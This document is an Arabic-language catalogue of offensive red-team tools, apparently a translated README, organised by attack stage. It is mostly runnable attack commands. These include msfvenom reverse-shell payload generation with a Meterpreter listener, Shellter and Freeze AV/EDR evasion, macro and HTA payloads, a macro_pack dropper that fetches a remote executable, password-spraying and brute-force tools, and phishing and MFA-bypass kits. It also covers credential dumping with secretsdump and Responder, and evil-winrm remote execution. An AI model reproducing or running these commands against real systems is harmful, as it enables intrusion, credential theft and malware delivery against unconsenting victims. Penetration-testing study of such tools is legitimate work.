./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

تتيح أداة Msfvenom إنشاء الحمولات (payloads) لمجموعة متنوعة من أنظمة التشغيل وبتنسيقات عديدة. كما تدعم إخفاء الحمولات لتجاوز برامج مكافحة الفيروسات.
إعداد المستمع```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
#### أوامر Msfvenom
**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
ويندوز:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Shellter هي أداة حقن شيلكود ديناميكية، وأول أداة إصابة حقيقية للملفات التنفيذية (PE) ديناميكية على الإطلاق.
يمكن استخدامها لحقن الشيلكود في تطبيقات ويندوز الأصلية (حاليًا تطبيقات 32 بت فقط).
تستفيد Shellter من البنية الأصلية لملف PE ولا تطبق أي تعديلات مثل تغيير أذونات الوصول للذاكرة في الأقسام (إلا إذا أراد المستخدم)، أو إضافة قسم إضافي بصلاحية RWE، أو أي شيء قد يبدو مريبًا أثناء فحص برامج مكافحة الفيروسات.
يمكن العثور على معلومات README الكاملة هنا.
التثبيت: (Kali)```bash apt-get update apt-get install shellter
**تثبيت: (ويندوز)**
قم بزيارة [صفحة التحميل](https://www.shellterproject.com/download/) وقم بالتثبيت.
**الاستخدام:**
ما عليك سوى اختيار ملف ثنائي شرعي لاختراقه وتشغيل Shellter.
يمكن العثور على بعض النصائح المفيدة [هنا](https://www.shellterproject.com/tipstricks/).
يمكن العثور على الكثير من عروض توضيحية من المجتمع [هنا](https://www.shellterproject.com/shellter-community-demos/).

*الصورة مأخوذة من https://www.kali.org/tools/shellter/images/shellter.png*
### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)
Freeze هي أداة إنشاء حمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة متخفية.
تستخدم Freeze تقنيات متعددة ليس فقط لإزالة روابط EDR الخاصة بالمستخدم، ولكن أيضًا لتنفيذ شيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى لنقاط النهاية.
**تثبيت:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
الاستخدام:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

*الصورة مستخدمة من https://www.blackhatethicalhacking.com/tools/freeze/*
### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)
سينشئ هذا السكريبت مستند Microsoft Word يحتوي على صورة عن بُعد، مما يسمح بالتقاط تجزئات NTML من نقطة نهاية الضحية عن بُعد.
يمتلك Microsoft Word القدرة على تضمين الصور من المواقع البعيدة، بما في ذلك صورة بعيدة مستضافة على خادم SMB يتحكم فيه المهاجم. يمنحك هذا الفرصة للاستماع إلى تجزئات NTLM التي تُرسل عند فتح الضحية المُوثَّقة للمستند وعرض الصورة.
**تثبيت:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
الاستخدام:```bash
./main.py 127.0.0.1 test.jpg 1
./main.py 127.0.0.1 test.jpg 0\n

*الصورة مأخوذة من https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*
### [🔙](#tool-list)[وظائف NTAPI غير الموثقة](http://undocumented.ntinternals.net/)
يقدم هذا الموقع معلومات عن الأجزاء الداخلية غير الموثقة لنظام ويندوز، واستدعاءات النظام، وهياكل البيانات، والتفاصيل المنخفضة المستوى الأخرى لنظام تشغيل ويندوز.
يمكن أن يكون موردًا قيمًا للأفراد الذين يرغبون في استكشاف الأجزاء الداخلية لويندوز لأغراض متنوعة، بما في ذلك تحليل الثغرات، تطوير الاستغلالات، ورفع الامتيازات.
عند تطوير الاستغلالات، فإن فهم الأجزاء الداخلية للنظام المستهدف أمر بالغ الأهمية. يمكن أن يساعد هذا الموقع في تطوير الاستغلالات من خلال الاستفادة من الجوانب غير الموثقة منخفضة المستوى لويندوز.
**الاستخدام:**
قم بزيارة [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

*الصورة مأخوذة من http://undocumented.ntinternals.net/*
### [🔙](#tool-list)[وظائف استرجاع النواة](https://codemachine.com/articles/kernel_callback_functions.html)
تقدم هذه المذكرة التقنية قائمة شاملة بجميع واجهات برمجة التطبيقات التي يصدرها نواة ويندوز، لكتابة برامج التشغيل لتسجيل وظائف الاسترجاع التي تستدعيها مكونات النواة في ظروف مختلفة.
معظم هذه الإجراءات موثقة في حزمة تشغيل ويندوز (WDK) ولكن بعضها مخصص للاستخدام بواسطة برامج التشغيل المضمنة.
يتم وصف الوظائف غير الموثقة بإيجاز بينما يتم إدراج الوظائف الموثقة هنا للإشارة فقط.
**الاستخدام:**
قم بزيارة [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

*الصورة مأخوذة من https://codemachine.com*
### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)
مجموعة من التقنيات الهجومية، والنصوص، والروابط المفيدة لتحقيق تنفيذ الأكواد وتجنب الدفاعات عبر ماكروات الأوفيس.
**الاستخدام:**
قم بزيارة [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

*الصورة مأخوذة من https://github.com/S3cur3Th1sSh1t*
### [🔙](#tool-list)WSH
**إنشاء الحمولة:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
تنفيذ:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**إنشاء الحمولة:**```html
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
تنفيذ: تشغيل الملف
إنشاء الحمولة:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**تنفيذ:** تعيين الدالة إلى Auto_Open() في مستند ممكّن بماكرو
الوصول الأولي
====================
### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)
قم بتشغيل هجوم رش كلمة المرور / القوة العمياء عبر وكلاء تمرير Amazon AWS، مع تغيير عنوان IP الطالب لكل محاولة مصادقة. يؤدي ذلك إلى إنشاء واجهات برمجة تطبيقات FireProx ديناميكيًا لرش كلمات مرور أكثر تمويًا.
يوفر CredMaster طريقة لتشغيل رش كلمات مرور مجهولة ضد نقاط النهاية في أداة بسيطة وسهلة الاستخدام. توفر أداة FireProx عنوان IP الطالب المتناوب، بينما يقوم أساس CredMaster بتزوير جميع المعلومات التعريفية الأخرى.
الميزات:
- دعم كامل لجميع مناطق AWS
- إنشاء واجهات برمجة تطبيقات تلقائيًا لتمرير الوكيل
- تزوير أرقام تتبع API، وعناوين IP المرسلة، ورؤوس تتبع الوكيل الأخرى
- معالجة متعددة الخيوط
- عدادات تأخير كلمة المرور وتكوين لتجنب سياسات القفل
- إضافة إضافات جديدة بسهولة
- مجهول تمامًا
**التثبيت:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt
للحصول على تعليمات التثبيت الكاملة انظر هنا.
الاستخدام:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json
هذه الأداة تتطلب مفاتيح وصول API لأمازون، دليل حول كيفية الحصول على هذه المفاتيح موجود هنا: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

*الصورة المستخدمة من https://github.com/knavesec/CredMaster/wiki*
### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
TREVORspray هي أداة رش كلمات مرور معيارية مع خيوط معالجة، وكالة SSH، وحدات نهب، والمزيد!
**التثبيت:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray
الاستخدام:```bash
python3 ./trevorspray --recon evilcorp.com
python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10
python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token
للحصول على تعليمات الاستخدام الكاملة، انظر [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

*الصورة مأخوذة من https://github.com/blacklanternsecurity/TREVORspray*
### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)
مجموعة أدوات توضح نهجًا آخر لهجوم QRLJacking، مما يسمح بتنفيذ استيلاء على الحساب عن بُعد، عبر التصيد باستخدام رمز QR لتسجيل الدخول.
يتكون من إضافة متصفح يستخدمها المهاجم لاستخراج رمز QR لتسجيل الدخول، وتطبيق خادم يقوم بجلب رموز QR لتسجيل الدخول لعرضها على صفحات التصيد المستضافة.
عرض توضيحي [video](https://www.youtube.com/watch?v=8pfodWzqMcU)
**التثبيت: (الإضافة)**
يمكنك تحميل الإضافة في Chrome، عبر ميزة `Load unpacked`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked
بمجرد تثبيت الإضافة، تأكد من تثبيت أيقونتها في شريط أدوات الإضافات في Chrome، بحيث تكون الأيقونة مرئية دائمًا.
**التثبيت: (الخادم)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat
الاستخدام:
./server/build/evilqr-server3. تأكد من أن رمز QR لتسجيل الدخول مرئي، ثم انقر على أيقونة الإضافة **Evil QR** في شريط الأدوات. إذا تم التعرف على رمز QR، يجب أن تضيء الأيقونة بالألوان.
4. افتح عنوان URL لصفحة التصيد الخاصة بالخادم: `http://127.0.0.1:35000` (الافتراضي)

*الصورة من https://breakdev.org/evilqr-phishing/*
### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)
الشكل الأكثر شيوعًا للمصادقة هو الجمع بين اسم المستخدم وكلمة المرور أو عبارة المرور. يمكن أحيانًا تخمين كلمات المرور من خلال تمييز المستخدم، مثل تاريخ الميلاد، أو اللقب، أو العنوان، أو اسم حيوان أليف أو قريب، أو كلمة شائعة مثل God، love، money أو password.
لهذا السبب وُلدت CUPP.
**التثبيت:**```bash
git clone https://github.com/Mebus/cupp;cd cupp
الاستخدام:```bash
python3 ./cupp.py -i

*الصورة مأخوذة من https://github.com/Mebus/cupp*
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunny هو أداة هجومية فيزيائية عبر USB ونظام توصيل حمولات متعددة الوظائف. صُمم ليكون موصلاً بمنفذ USB للحاسوب ويمكن برمجته لأداء مجموعة متنوعة من الوظائف، بما في ذلك معالجة البيانات واستخراجها، وتثبيت البرامج الضارة، وتجاوز الإجراءات الأمنية.
[hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[Hak5 Documentation](https://docs.hak5.org/bash-bunny/)
[Nice Payload Repo](https://github.com/hak5/bashbunny-payloads)
[صفحة المنتج](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish. (GoPhish) Gophish هو إطار عمل تصيد قوي ومفتوح المصدر يسهل اختبار مدى تعرض مؤسستك للتصيد. (evilginx2) إطار عمل مستقل للهجوم الوسيط (Man-in-the-Middle) يُستخدم لتصيد بيانات تسجيل الدخول مع ملفات تعريف الارتباط للجلسات، مما يسمح بتجاوز المصادقة الثنائية.
**التثبيت:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
الاستخدام:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
هذا الإطار رائع لإنشاء حملات للوصول الأولي، 'SET لديه عدد من نواقل الهجوم المخصصة التي تسمح لك بصنع هجوم مقنع بسرعة'.
**التثبيت:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
الاستخدام:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
أداة رائعة لهجمات القوة الغاشمة لتسجيل الدخول. يمكنها تنفيذ هجمات القوة الغاشمة على عدد من الخدمات بما في ذلك SSH و FTP و TELNET و HTTP إلخ.
**التثبيت:**```bash
sudo apt install hydra
الاستخدام:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish هي أداة تصيد متقدمة تستخدم تقنية تجمع بين تدفق مصادقة رمز جهاز OAuth ورموز QR (انظر [PhishInSuits](https://github.com/secureworks/PhishInSuits) لمزيد من المعلومات حول تدفق رمز جهاز OAuth لهجمات التصيد).
خطوات الهجوم:
- إرسال رمز QR ضار إلى الضحية
- يمسح الضحية رمز QR بجهاز محمول
- يتم توجيه الضحية إلى خادم يتحكم فيه المهاجم (تشغيل عملية تدفق مصادقة رمز جهاز OAuth)
- يتم إرسال رمز MFA بالبريد الإلكتروني للضحية (تشغيل مؤقت 15 دقيقة لتدفق رمز جهاز OAuth)
- يقوم المهاجم بالاستعلام عن المصادقة
- يدخل الضحية الرمز في موقع Microsoft الشرعي
- يحفظ المهاجم رمز المصادقة
**التثبيت:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
ملاحظة: قبل استخدام أي من الوحدتين، قم بتحديث المعلومات المطلوبة في ملف settings.config المُشار إليها بـ Required.
الاستخدام (وحدة البريد الإلكتروني):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**الاستخدام (وحدة الخادم):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisher هي أداة تسمح للمهاجمين بإنشاء وإرسال رسائل تصيد إلكتروني إلى الضحايا للحصول على معلومات حساسة.
تتضمن ميزات مثل قوالب قابلة للتخصيص، وإدارة الحملات، وقدرات إرسال البريد الإلكتروني، مما يجعلها أداة قوية وسهلة الاستخدام لتنفيذ هجمات التصيد. باستخدام King Phisher، يمكن للمهاجمين استهداف الأفراد أو المؤسسات برسائل تصيد مستهدفة ومقنعة، مما يزيد من فرص نجاح هجماتهم.
تثبيت (لينكس - العميل والخادم):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**الاستخدام:**
بمجرد تثبيت King Phisher، يرجى اتباع [صفحة الويكي](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) لإعداد SSH، وتكوين قاعدة البيانات، وخادم SMTP، إلخ.

التنفيذ
====================
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responder هي أداة لتسميم بروتوكولات LLMNR و NBT-NS على الشبكة، للسماح بالتقاط بيانات الاعتماد وتنفيذ الأكواد التعسفية.
تُستخدم بروتوكولات LLMNR (تحليل اسم الإرسال المتعدد المحلي) و NBT-NS (خدمة أسماء NetBIOS) بواسطة أنظمة Windows لحل أسماء المضيفين إلى عناوين IP على شبكة محلية. إذا تعذر حل اسم مضيف باستخدام هذه البروتوكولات، فسيقوم النظام ببث طلب لاسم المضيف إلى الشبكة المحلية.
يستمع Responder إلى هذه البثوث ويستجيب بعنوان IP مزيف، مخادعاً النظام الطالب لإرسال بيانات اعتماده إلى المهاجم.
**التثبيت:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
الاستخدام:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
يمكن العثور على معلومات الاستخدام الكاملة [هنا](https://github.com/SpiderLabs/Responder#usage).

*الصورة مستخدمة من https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
أداة هي جزء من مكتبة Impacket يمكن استخدامها لاستخراج تجزئات كلمات المرور والأسرار الأخرى من نظام ويندوز.
يقوم بذلك عن طريق التفاعل مع قاعدة بيانات مدير حسابات الأمان (SAM) على النظام واستخراج تجزئات كلمات المرور والمعلومات الأخرى، مثل:
- تجزئات كلمات المرور للحسابات المحلية
- تذاكر ومفاتيح Kerberos
- أسرار LSA
**التثبيت:**```bash
python3 -m pip install impacket
الاستخدام:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

*الصورة مستخدمة من https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM هي أداة توفر واجهة سطر أوامر لإدارة ويندوز عن بعد (WinRM: *خدمة تسمح للمسؤولين بتنفيذ الأوامر عن بعد على جهاز ويندوز*).
تسمح Evil-WinRM للمهاجم بالاتصال عن بعد بجهاز ويندوز باستخدام WinRM وتنفيذ أوامر عشوائية.
بعض الميزات تشمل:
- تحميل سكريبتات Powershell في الذاكرة
- تحميل ملفات dll في الذاكرة متجاوزاً بعض برامج مكافحة الفيروسات
- تحميل حمولات x64
- دعم Pass-the-hash
- رفع وتنزيل الملفات المحلية والبعيدة
**التثبيت: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
تثبيت: (Ruby gem)```bash gem install evil-winrm
يمكن العثور على تعليمات التثبيت البديلة [هنا](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).
**الاستخدام:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
يمكن العثور على وثائق الاستخدام الكاملة هنا.

الصورة المستخدمة من https://korbinian-spielvogel.de/posts/heist-writeup/
أداة للتنفيذ داخل الذاكرة لملفات VBScript وJScript وEXE وDLL وتجميعات dotNET. يمكن استخدامها لتحميل وتشغيل الحمولات المخصصة على الأنظمة المستهدفة دون الحاجة إلى إسقاط الملفات على القرص.
التثبيت: (Windows)```bash git clone http://github.com/thewover/donut.git
لإنشاء قالب المحمل، والمكتبة الديناميكية donut.dll، والمكتبة الثابتة donut.lib، والمولد donut.exe. ابدأ تشغيل موجه أوامر المطور لـ Microsoft Visual Studio x64، وانتقل إلى الدليل الذي استنسخت فيه مستودع Donut، ثم أدخل ما يلي:```bash
nmake -f Makefile.msvc
لفعل الشيء نفسه، باستثناء استخدام MinGW-64 على Windows أو Linux، انتقل إلى الدليل الذي استنسخت فيه مستودع Donut وأدخل ما يلي:```bash make -f Makefile.mingw
**تثبيت: (Linux)**```bash
pip3 install donut-shellcode
استخدام:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
للحصول على معلومات الاستخدام الكاملة، راجع صفحة دونات على [GitHub Page](https://github.com/TheWover/donut/#4-usage).
اطلع على [منشور مدونة حديث](https://thewover.github.io/Bear-Claw/) من The Wover لمزيد من المعلومات.

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
أداة تُستخدم لأتمتة إخفاء وإنشاء مستندات Office، ونصوص VB، والاختصارات، وتنسيقات أخرى لفرق الاختراق (red teaming).
**التثبيت: (ثنائي)**
1. احصل على أحدث إصدار ثنائي من [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. قم بتنزيل الإصدار الثنائي على جهاز كمبيوتر مثبت عليه Microsoft Office أصلي.
3. افتح وحدة التحكم، واستخدم CD للانتقال إلى دليل الإصدار الثنائي ثم قم بتشغيله.
**التثبيت: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
الاستخدام:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
مجموعة من نصوص ووحدات PowerShell النصية التي يمكن استخدامها لتحقيق أهداف متنوعة للفريق الأحمر.
بعض ميزات PowerSploit:
- تفريغ هاشات كلمات المرور واستخراج كلمات المرور النصية الواضحة من الذاكرة
- رفع الصلاحيات وتجاوز ضوابط الأمان
- تنفيذ كود PowerShell عشوائي وتجاوز قيود التنفيذ
- إجراء استطلاع واكتشاف للشبكة
- توليد حمولات وتنفيذ استغلالات
**التثبيت:** *1. احفظ في مجلد وحدات PowerShell*
أولاً، ستحتاج إلى تنزيل [مجلد PowerSploit](https://github.com/PowerShellMafia/PowerSploit) وحفظه في مجلد وحدات PowerShell الخاص بك.
يمكن العثور على مسار مجلد وحدات PowerShell الخاص بك باستخدام الأمر التالي:```
$Env:PSModulePath
التثبيت: 2. تثبيت PowerSploit كوحدة نمطية لـ PowerShell
ستحتاج بعد ذلك إلى تثبيت وحدة PowerSploit (استخدم اسم المجلد الذي تم تنزيله).
ملاحظة: قد تمنعك سياسة تنفيذ PowerShell من ذلك، لإصلاح هذه المشكلة قم بتشغيل الأمر التالي.``` powershell.exe -ep bypass
يمكنك الآن تثبيت وحدة PowerSploit.```
Import-Module PowerSploit
الاستخدام:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
أداة يمكن استخدامها لتنفيذ إجراءات متنوعة متعلقة ببيئات Microsoft Active Directory (AD)، مثل تفريغ تجزئات كلمات المرور، إنشاء/حذف المستخدمين، وتعديل خصائص المستخدمين.
بعض ميزات Rubeus:
- Kerberoasting
- هجمات التذكرة الذهبية (Golden ticket)
- هجمات التذكرة الفضية (Silver ticket)
**التثبيت: (تنزيل)**
يمكنك تثبيت الثنائي Rubeus غير الرسمي المُجمّع مسبقًا [هنا](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).
**التثبيت: (ترجمة)**
Rubeus متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح ملف [project .sln](https://github.com/GhostPack/Rubeus) لمشروع Rubeus، اختر "Release"، ثم قم بالبناء.
**الاستخدام:**```
Rubeus.exe -h

أداة مفيدة لفحص نقطة نهاية الضحية بحثًا عن الثغرات المتعلقة بالعمليات ذات السلامة العالية، والمجموعات، والمسارات القابلة للاختطاف، وما إلى ذلك.
التثبيت: (تنزيل)
يمكنك تثبيت الثنائي SharpUp غير الرسمي والمُجمّع مسبقًا هنا.
التثبيت: (تجميع)
SharpUp متوافق مع Visual Studio 2015 Community Edition. افتح ملف المشروع .sln الخاص بـ SharpUp، واختر "Release"، ثم قم بالبناء.
الاستخدام:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) هو نظام إدارة قواعد بيانات علائقية تم تطويره وتسويقه بواسطة Microsoft.
تم تصميم هذه الأداة (C# MS-SQL) للاستطلاع الهجومي وما بعد الاستغلال. للحصول على معلومات مفصلة حول استخدام كل تقنية، راجع [wiki](https://github.com/skahwah/SQLRecon/wiki).
**التثبيت: (ثنائي)**
يمكنك تنزيل أحدث إصدار ثنائي من [هنا](https://github.com/skahwah/SQLRecon/releases).
**الاستخدام:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases
# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
يمكن العثور على معلومات الاستخدام الكاملة في الويكي.
يمكن العثور على معلومات استخدام وحدة الأداة هنا.

الصورة مأخوذة من صفحة تعليمات SQLRecon
هذا المورد عبارة عن مجموعة من أشهر التقنيات المعروفة لتجاوز AppLocker.
نظرًا لأنه يمكن تكوين AppLocker بطرق مختلفة، يحتفظ @api0cradle بقائمة موثقة من عمليات التجاوز (التي تعمل مقابل القواعد الافتراضية لـ AppLocker) وقائمة بتقنيات التجاوز المحتملة (حسب التكوين) أو التي يُزعم أنها تجاوز من قبل شخص ما.
لديهم أيضًا قائمة بتقنيات التجاوز العامة بالإضافة إلى قائمة قديمة بالطرق للتنفيذ عبر ملفات DLL.
قوائم مفهرسة

الصورة مأخوذة من https://github.com/api0cradle/UltimateAppLockerByPassList
مُطلق إمبراطورية (Empire) يعتمد على JavaScript وVBScript، ويعمل ضمن مضيف PowerShell المضمن الخاص به.
يعمل كلا المُطلِقين ضمن مضيف PowerShell المضمن الخاص بهذا، لذلك لا نحتاج إلى PowerShell.exe.
قد يكون هذا مفيدًا عندما تمنع الشركة استخدام PowerShell.exe و/أو تستخدم حل قائمة بيضاء للتطبيقات، ولكنها لا تمنع تشغيل ملفات JS/VBS.
الاستخدام:
للإصدار المعتمد على JavaScript، استخدم المتغير التالي:```javascript var EncodedPayload = ""
بالنسبة لإصدار VBScript، استخدم المتغير التالي:```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"

صورة مستخدمة من https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html
الهدف من هذا المشروع هو إنشاء ملفات .html تحتوي على ملف HTA مشفر.
الفكرة هي أنه عندما يزور هدفك الصفحة، يتم جلب المفتاح وفك تشفير ملف HTA ديناميكيًا داخل المتصفح ودفعه مباشرة إلى المستخدم.
هذه تقنية مراوغة للالتفاف حول فحص المحتوى / نوع الملف الذي تنفذه بعض الأجهزة الأمنية.
مزيد من المعلومات التقنية هنا.
التثبيت:``` git clone https://github.com/nccgroup/demiguise cd demiguise
**الاستخدام:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

الصورة مستخدمة من https://github.com/nccgroup/demiguise
PowerZure هو مشروع PowerShell تم إنشاؤه لتقييم واستغلال الموارد داخل منصة السحابة مايكروسوفت، Azure. تم إنشاء PowerZure نتيجة للحاجة إلى إطار عمل يمكنه تنفيذ كل من الاستطلاع واستغلال Azure وAzureAD والموارد المرتبطة بهما.
لا يوجد أي سبب لتشغيل PowerZure على جهاز الضحية. يتم المصادقة باستخدام ملف accesstoken.json موجود مسبقًا أو عن طريق تسجيل الدخول عبر موجه عند تسجيل الدخول إلى Azure، مما يعني أنه يمكنك استخدام PowerZure بأمان للتفاعل مع مثيل سحابي للضحية من جهاز التشغيل الخاص بك.
التثبيت:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1
**الاستخدام:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget
Blog - Attacking Azure, Azure AD, and Introducing PowerZure

صورة مستخدمة من https://hakin9.org
